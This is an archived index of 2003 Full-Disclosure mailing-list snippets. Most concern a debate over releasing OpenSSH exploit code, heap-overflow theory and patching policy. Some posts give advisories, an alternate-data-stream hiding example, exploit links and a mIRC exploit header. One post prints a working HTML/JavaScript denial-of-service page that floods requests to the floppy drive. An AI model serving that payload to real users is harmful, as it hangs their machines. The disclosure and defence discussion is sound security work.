Re: [Full-Disclosure] No Subject (re: openssh exploit code?)

2003-10-21 Thread security snot
Yeah, Paul, you're a real smart guy I see! Just like everyone else who wants to see one of the exploits for the bug, you try to taunt those of us who are somewhat skilled at programming and have already developed our own commercial grade exploits to release what we have slaved over. Of course,

Re: [Full-Disclosure] Re: No Subject

2003-10-21 Thread Michal Zalewski
On Mon, 20 Oct 2003, Frank Knobbe wrote: Right then. Perhaps that makes me a script kiddie. I just cannot comprehend a case where an unknown area of the heap is overwritten with 0's causes a fault that is exploitable to the point of executing injected code. I mean, you don't inject code.

Re: [Full-Disclosure] No Subject (re: openssh exploit code?)

2003-10-21 Thread mitch_hurrison
Hi Paul, Again, what is it about your personality that makes you incapable of taking part in an adult discussion of responsible disclosure issues? Is it that anyone who has a different opinion than yours is automatically not worth your time? That sounds kind of nazi-like to me, Mr. Schmehl. It's

Re: [Full-Disclosure] Re: No Subject

2003-10-21 Thread Frank Knobbe
On Tue, 2003-10-21 at 02:21, Michal Zalewski wrote: While I'd hate to take sides on the OpenSSH vulnerability, this alone is not a problem. On little endian machines, other than overwriting (zeroing) variables, you can also benefit from partial pointer overwrite, Howdy Michal, just to

[Full-Disclosure] svchost.exe crashes

2003-10-21 Thread Daniel Tams
Today I have had 3 computers--one Win XP and two Win2000--reported where svchost.exe crashes with the following error message: -begin-quote- Error: svchost.exe - Application Error The instruction at 0x1000526f referenced memory at 0x. The memory could not be read. Click on Ok to

Re: [Full-Disclosure] No Subject (re: openssh exploit code?)

2003-10-21 Thread Anders B Jansson
There's two sets of bad attitude going round and round in this thread. Heating the debate to pure silliness. One shown by the parties that understand how a buffer overflow with only zeroes can be exploited, but who until today have refused to even mention the theory behind it. Resorting to if

Re: [Full-Disclosure] No Subject (re: openssh exploit code?)

2003-10-21 Thread John Sage
hmm.. On Tue, Oct 21, 2003 at 12:02:19AM -0500, Paul Schmehl wrote: --On Monday, October 20, 2003 5:19 PM -0700 Gregory A. Gilliss [EMAIL PROTECTED] wrote: /* snip */ Paul Schmehl ([EMAIL PROTECTED]) Adjunct Information Security Officer adjunct n. 1. Something attached to another thing

[Full-Disclosure] Windows covert channel

2003-10-21 Thread Wally Eaton
James, You may be thinking of Streams in Windows files. Data can be hidden in secondary files on NTFS partitions. I believe it was developed to be compatible with Apple/ MAC systems. In any case the following is an example: Run CMD On a NTFS partition D:\ echo Hello FrontFile D:\ type

Re: [Full-Disclosure] Re: Teenager cleared of hacking - Off Topic?

2003-10-21 Thread David Howe
The experts gave very clear evidence that the attack was initiated locally and log files cannot be planted remotely the way they were found on his computer. I would be astonished if this were true - there is *no limit* on what a trojan can do if it gains full control of your computer.

Re: [Full-Disclosure] Windows covert channel

2003-10-21 Thread Rainer Gerhards
This is a well-known issue that was even part of the MCSE for NT 3.51 tutorial guides ;) Anyhow, it is still an issue, and the root cause for others (like the IIS $$DATA information disclosure vulnerability). If you google for it, you will also find tools to detect those alternate data streams.

[Full-Disclosure] Potential DoS in WinSyslog/MonitorWare Agent Interactive Syslog Server

2003-10-21 Thread Rainer Gerhards
This is a vendor-bulletin. There is a potential DoS in Interactive Syslog Server, a debugging and interactive troubleshooting tool, included in WinSyslog and MonitorWare Agent. All versions downloaded prior to 2003-09-16 have the vulnerable component included and installed by default. Full

Re: [Full-Disclosure] JAP Wins Court Victory

2003-10-21 Thread David Howe
The JAP folks have won a major court victory. See their site. http://anon.inf.tu-dresden.de/index_en.html This is of course true - JAP have won a great moral victory. Unfortunately, they may have achieved the moral high ground in court, but the fact still remains that they a) DID trojan their

[Full-Disclosure] SANS Top 20 [scanned]

2003-10-21 Thread Veit Wahlich
On Oct 8, SANS released version 4 of the 20 most critical internet security issues, a comprehensively commented list consisting of the Top10 MICROS~1 Windows and Top10 UNIX(-like) OS'/services' problems: http://www.sans.org/top20/ Regards, // Veit -- _. ._ . .Veit Wahlich (_. )

Re: [Full-Disclosure] No Subject (re: openssh exploit code?)

2003-10-21 Thread madsaxon
At 04:18 AM 10/21/03 -0700, John Sage wrote: So by the word - you yourself have chosen - you're somebody important's subordinate, temporary flunky. I know I'm impressed. Almost all of us fit that description. Stop it. m5x ___ Full-Disclosure - We

RE: [Full-Disclosure] No Subject (re: openssh exploit code?)

2003-10-21 Thread Schmehl, Paul L
-Original Message- From: security snot [mailto:[EMAIL PROTECTED] Sent: Tuesday, October 21, 2003 1:59 AM To: Schmehl, Paul L Cc: [EMAIL PROTECTED] Subject: Re: [Full-Disclosure] No Subject (re: openssh exploit code?) Yeah, Paul, you're a real smart guy I see! Just like

RE: [Full-Disclosure] No Subject (re: openssh exploit code?)

2003-10-21 Thread Schmehl, Paul L
-Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] Sent: Tuesday, October 21, 2003 2:23 AM To: Schmehl, Paul L Cc: [EMAIL PROTECTED] Subject: Re: [Full-Disclosure] No Subject (re: openssh exploit code?) Again, what is it about your personality that makes you

Re: [Full-Disclosure] Re: No Subject

2003-10-21 Thread Michal Zalewski
On Tue, 21 Oct 2003, Frank Knobbe wrote: just to clarify, you mean on machines with a paged memory addressing scheme, right? I mean, byte-order itself is not the catalyst, but the fact that an address is formed by a page and a pointer within that page, right? (I'm not nit-picking, just trying

RE: [Full-Disclosure] No Subject (re: openssh exploit code?)

2003-10-21 Thread Brent J. Nordquist
On Tue, 21 Oct 2003, Schmehl, Paul L [EMAIL PROTECTED] wrote: I personally would prefer that every system gets patched the day the patch is released. I wouldn't. What happens when the patch is broken? But that's just one more factor to consider, underneath your larger argument: in the real

RE: [Full-Disclosure] No Subject (re: openssh exploit code?)

2003-10-21 Thread mitch_hurrison
Hi Paul, I'm glad to see you are capable of a sensible response. I see your points and it's nothing I haven't heard before. The thing is, your arguments don't really hold any ground in this particular event. I've said all along that this issue has been publicly recognised as being a security

[Full-Disclosure] SQL Injection Vulnerability in FuzzyMonkey MyClassifieds SQL Version

2003-10-21 Thread Sintelli SINTRAQ
SQL Injection Vulnerability in FuzzyMonkey MyClassifieds SQL Version 18 October 2003 Original Advisory http://www.sintelli.com/adv/sa-2003-04-myclassified.pdf Background My Classifieds SQL is a Perl/CGI/MySQL script which will quickly and easily allow the hosting of a classifieds forum on a

Re: [Full-Disclosure] No Subject (re: openssh exploit code?)

2003-10-21 Thread Jason Coombs
Aloha, Mitch. Your essay on the immorality of releasing exploit code was very well thought out, and I commend you for it and for standing up for something that you believe in -- particularly in a venue that is openly hostile to your viewpoint. That having been said, your conclusions are

Re: [Full-Disclosure] JAP Wins Court Victory

2003-10-21 Thread David Howe
That is not the point. They were required by law to do this secretly. Actually, publishing the source code that revealed the changes was already bending the law. So what you are asking for is that they break the law and give up their careers. To be honest? I don't know. I could hope that if I

Re: [Full-Disclosure] No Subject (re: openssh exploit code?)

2003-10-21 Thread Valdis . Kletnieks
On Tue, 21 Oct 2003 00:22:53 PDT, [EMAIL PROTECTED] said: As far as it being easy to exploit. No it isn't. You have to abuse a lesser issue, a memory leak to be more precise, to get a heap layout that will allow you to survive the initial memset without landing in bad memory. Now without going

Re: [Full-Disclosure] No Subject (re: openssh exploit code?)

2003-10-21 Thread mitch_hurrison
Hi Jason, First of all, thanks for taking the time to write a well thought out response to my views and my statements. Now let's get to it. That having been said, your conclusions are wrong. In part this is caused by a simple slip of logic and perhaps a flawed understanding of statistics.

[Full-Disclosure] Where to find NYC and New Jersey Penetration Testing Firms

2003-10-21 Thread Governmentsecurity.org
Hello All, Right now I am looking for a directory that lists local Penetration Testing Companies in the NYC and New Jersey area. I have been able to track down a rather large amount but I am still looking for additional companies. I have a project that may need bidding in the future and would

RE: [Full-Disclosure] No Subject (re: openssh exploit code?)

2003-10-21 Thread Schmehl, Paul L
-Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] Sent: Tuesday, October 21, 2003 12:18 PM To: Schmehl, Paul L Cc: [EMAIL PROTECTED] Subject: RE: [Full-Disclosure] No Subject (re: openssh exploit code?) I've said all along that this issue has been publicly

[Full-Disclosure] remote mirc 6.11 exploit

2003-10-21 Thread test test2
Posted on security corporation : http://www.security-corporation.com/exploits-20031021-001.html /** gEEk-fuck-khaled.c -- remote mirc 6.11 exploit by blasty TESTED ON: Windows XP (No SP, Ducth) Build: 2600.xpclient.010817-1148 A few days ago, I saw a mIRC advisory on packetstorm [1

Re: [Full-Disclosure] Re: No Subject

2003-10-21 Thread Bradford Shedwick
Anyone know what runs on tcp port 255? Any known viruses or trojans? Napoleon Michal Zalewski [EMAIL PROTECTED] wrote: On Tue, 21 Oct 2003, Frank Knobbe wrote: just to clarify, you mean on machines with a paged memory addressing scheme, right? I mean, byte-order itself is not the catalyst, but the

RE: [Full-Disclosure] No Subject (re: openssh exploit code?)

2003-10-21 Thread Bassett, Mark
If I have say.. 100 boxes with ssh on them I would not be likely to drop them all, install the patches and bring them back up for an exploit that snip *May** allow a remote attacker to corrupt heap memory Which in turn *could cause a denial-of-service condition. Furthermore It

[Full-Disclosure] remote mirc 6.11 exploit

2003-10-21 Thread Daigoku
Posted on security corporation : http://www.security-corporation.com/exploits-20031021-001.html Do you Yahoo!? The New Yahoo! Shopping - with improved product search

Re: [Full-Disclosure] No Subject (re: openssh exploit code?)

2003-10-21 Thread Blue Boar
[EMAIL PROTECTED] wrote: My main point being there is simply no need for the disclosure of exploits. English is a funny language. Based on the rest of your note, I assume by no need, you mean that there's no one forcing you to release your exploits, and you see no moral imperative that says

Re: [Full-Disclosure] remote mirc 6.11 exploit

2003-10-21 Thread Stephen
what a lame exploit on a lame site, just a mirror of packetstorm and k-otic ... Peter /** gEEk-fuck-khaled.c -- remote mirc 6.11 exploit by blasty ** ** TESTED ON: Windows XP (No SP, Ducth) Build: 2600.xpclient.010817-1148 ** ** A few days ago, I saw a mIRC advisory on packetstorm [1]

[Full-Disclosure] The NASA websites security holes report will be finished this Sunday.

2003-10-21 Thread Lorenzo Hernandez Garcia-Hierro
Hi friends, This weekend I had to study a lot so I couldn't finish the NASA related report. This Sunday it will be finished and publicly available ( some sections will be closed until Nasa response team patches the websites ). So, Best Regards to all and thanks to everybody that suggested the best

Re: [Full-Disclosure] Tanato WarGame , notes and news

2003-10-21 Thread Lorenzo Hernandez Garcia-Hierro
Dear Mark, There is a file useful for something , it is the way to bypass the authentication. imagine how to include the file for use as auth data this: username password USEFUL FOR SOMETHING , IT IS AN EASY LEVEL ;-) so , try to do a little research in the next level, there is a lot of info

RE: [Full-Disclosure] No Subject (re: openssh exploit code?)

2003-10-21 Thread Montana Tenor
I agree with Mitch. Let's say you get an advisory that a severe thunderstorm may be coming your way. Do you wait until the wind and rain are blowing inside your house to close the windows and doors? Do you allow the kids to keep playing outside? You do the prudent thing. Instead of trying to

RE: [Full-Disclosure] No Subject (re: openssh exploit code?)

2003-10-21 Thread Robert Ahnemann
-Original Message- From: Blue Boar [mailto:[EMAIL PROTECTED] Sent: Tuesday, October 21, 2003 2:19 PM To: [EMAIL PROTECTED] Cc: [EMAIL PROTECTED]; [EMAIL PROTECTED] Subject: Re: [Full-Disclosure] No Subject (re: openssh exploit code?) [EMAIL PROTECTED] wrote: My main point being

[Full-Disclosure] No Subject (re: openssh exploit code?)

2003-10-21 Thread mitch_hurrison
Hi Paul, Admins and management base decisions on those differences. Now let's look at the case at hand, which you characterize as devastating. Yes, lets. Note the words may..cause a denial-of-service condition and may.execute arbitrary code. It is those vagaries that folks who

[Full-Disclosure] When should you patch? Was: No Subject (re: openssh exploit code?)

2003-10-21 Thread Schmehl, Paul L
-Original Message- From: Montana Tenor [mailto:[EMAIL PROTECTED] Sent: Tuesday, October 21, 2003 3:05 PM To: Schmehl, Paul L Cc: [EMAIL PROTECTED]; [EMAIL PROTECTED] Subject: RE: [Full-Disclosure] No Subject (re: openssh exploit code?) I agree with Mitch. Let's say you get an

RE: [Full-Disclosure] No Subject (re: openssh exploit code?)

2003-10-21 Thread Robert Ahnemann
-Original Message- From: Montana Tenor [mailto:[EMAIL PROTECTED] Sent: Tuesday, October 21, 2003 3:05 PM To: Schmehl, Paul L Cc: [EMAIL PROTECTED]; [EMAIL PROTECTED] Subject: RE: [Full-Disclosure] No Subject (re: openssh exploit code?) I agree with Mitch. Let's say you get an

Re: [Full-Disclosure] No Subject (re: openssh exploit code?)

2003-10-21 Thread Benjamin Krueger
* Montana Tenor ([EMAIL PROTECTED]) [031021 13:59]: I agree with Mitch. Let's say you get an advisory that a severe thunderstorm may be coming your way. Do you wait until the wind and rain are blowing inside your house to close the windows and doors? Do you allow the kids to keep playing

RE: [Full-Disclosure] No Subject (re: openssh exploit code?)

2003-10-21 Thread Montana Tenor
Hi Robert, --- Robert Ahnemann [EMAIL PROTECTED] wrote: I flip to the local radar and get some sort of proof that there might be a thunderstorm coming. Talk is cheap (as was said), so it's up to the admin to verify if A) there is a real threat B) the threat applies to your systems C) the

RE: [Full-Disclosure] No Subject (re: openssh exploit code?)

2003-10-21 Thread Robert Ahnemann
Hi Robert, --- Robert Ahnemann [EMAIL PROTECTED] wrote: I flip to the local radar and get some sort of proof that there might be a thunderstorm coming. Talk is cheap (as was said), so it's up to the admin to verify if A) there is a real threat B) the threat applies to your

Re: [Full-Disclosure] No Subject (re: openssh exploit code?)

2003-10-21 Thread Dan Wilder
On Tue, Oct 21, 2003 at 01:05:20PM -0700, [EMAIL PROTECTED] wrote: Full disclosure is an exercise in futility. Anybody else think this thread has dragged on long enough? If so, please let's not feed the troll. -- Dan Wilder ___ Full-Disclosure -

RE: [Full-Disclosure] No Subject (re: openssh exploit code?)

2003-10-21 Thread Schmehl, Paul L
-Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] Sent: Tuesday, October 21, 2003 3:05 PM To: [EMAIL PROTECTED] Subject: [Full-Disclosure] No Subject (re: openssh exploit code?) Then this means that, if you as an admin cannot rely on the proper designated

Re: [Full-Disclosure] No Subject (re: openssh exploit code?)

2003-10-21 Thread Kenneth R. van Wyk
On Tuesday 21 October 2003 17:07, Robert Ahnemann wrote: I flip to the local radar and get some sort of proof that there might be a thunderstorm coming. Talk is cheap (as was said), so it's up to the admin to verify if A) there is a real threat B) the threat applies to your systems C) the

Re: [Full-Disclosure] No Subject (re: openssh exploit code?)

2003-10-21 Thread Richard Massa
So I know of a way to patch openssh without taking the server down, but that would improve efficiency and generally be useful knowledge to the security community so I'm not going to tell anyone about it on this full disclosure mailing list, I'd rather just flaunt my knowledge and gloat secretly

RE: [Full-Disclosure] No Subject (re: openssh exploit code?)

2003-10-21 Thread Ted Unangst
On Tue, 21 Oct 2003, Montana Tenor wrote: I agree with Mitch. Let's say you get an advisory that a severe thunderstorm may be coming your way. Do you wait until the wind and rain are blowing inside your house to close the windows and doors? Do you allow the kids to keep playing outside?

RE: [Full-Disclosure] No Subject (re: openssh exploit code?)

2003-10-21 Thread Generated by a PseudoRandom Number Generator
On somedate Montana said... I agree with Mitch. Let's say you get an advisory that a severe thunderstorm may be coming your way. Do you wait until the wind and rain are blowing inside your house to close the windows and doors? snip This is one of the silliest analogies I have ever heard. If

Re: [Full-Disclosure] Re: No Subject

2003-10-21 Thread Frank Knobbe
On Tue, 2003-10-21 at 11:42, Michal Zalewski wrote: On low endian, you can change a pointer such as: 0x08049648 ...to be one of the following: 0x08049600 0x0804 0x0800 Ah, duh... that just didn't enter my brain since I was focused on the exploit at hand, which I believe

[Full-Disclosure] IE6 Java 1.4.2_02 applet: Hardware stress on floppy drive

2003-10-21 Thread Marc Schoenefeld
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Hi, be prepared that your IE6 will be blocked if you run the java plugin (any 1.4.x including 1.4.2_02) with the following applet: http://www.illegalaccess.org/exploits/java/applet/MyFloppySucks.html Of course this only work when you have a drive

[Full-Disclosure] RE: IE6 Java 1.4.2_02 applet: Hardware stress on floppy drive

2003-10-21 Thread Richard M. Smith
Here's a more general approach to using the floppy drive for a DoS attack on a Windows machine: html head /head body script for(i = 1; i = 2000; ++i) { document.writeln(img src=a:\\foo + i + .gif width=1 height=1); } /script /body /html The fundamental problem here is that a Web page

Re: [Full-Disclosure] Re: No Subject

2003-10-21 Thread Michal Zalewski
On Tue, 21 Oct 2003, Frank Knobbe wrote: Ah, duh... that just didn't enter my brain since I was focused on the exploit at hand, which I believe does not allow such a precise sniping. Once again, I don't want to take sides, I had barely seen the code, never really bothered to analyze the

RE: [Full-Disclosure] No Subject (re: openssh exploit code?)

2003-10-21 Thread V.O.
These paragraphs do more to convince me that the exploit is possible than all the rest of the flame war put together. Thanks, both of you. does anybody need a refresher on heap overflows? :) http://vg.rstack.org/download/l01/bof.pdf (2002 btw) chapter 3 and 3.6 in particular. and of course

Re: [Full-Disclosure] Re: No Subject

2003-10-21 Thread Paul Schmehl
--On Wednesday, October 22, 2003 1:20 AM +0200 Michal Zalewski [EMAIL PROTECTED] wrote: Rant: mainstream Linux is generally not all that enthusiastic about implementing security features (even non-executable stack or using some feeble but standard kernel security capabilities is quite unpopular

Re: [Full-Disclosure] Re: No Subject

2003-10-21 Thread Byron Copeland
On Tue, 2003-10-21 at 21:41, Paul Schmehl wrote: --On Wednesday, October 22, 2003 1:20 AM +0200 Michal Zalewski [EMAIL PROTECTED] wrote: Rant: mainstream Linux is generally not all that enthusiastic about implementing security features (even non-executable stack or using some feeble but

Re: [Full-Disclosure] No Subject (re: openssh exploit code?)

2003-10-21 Thread morning_wood
unfortunately the windowz RPC exploit, without PoC would have gone unheeded in patching had it not been for a binary release of the exploit, and that was one of the worst in history. now, despite the millions of owned systems, this vulnerability is nearly extinct. even i get PoC from friendz that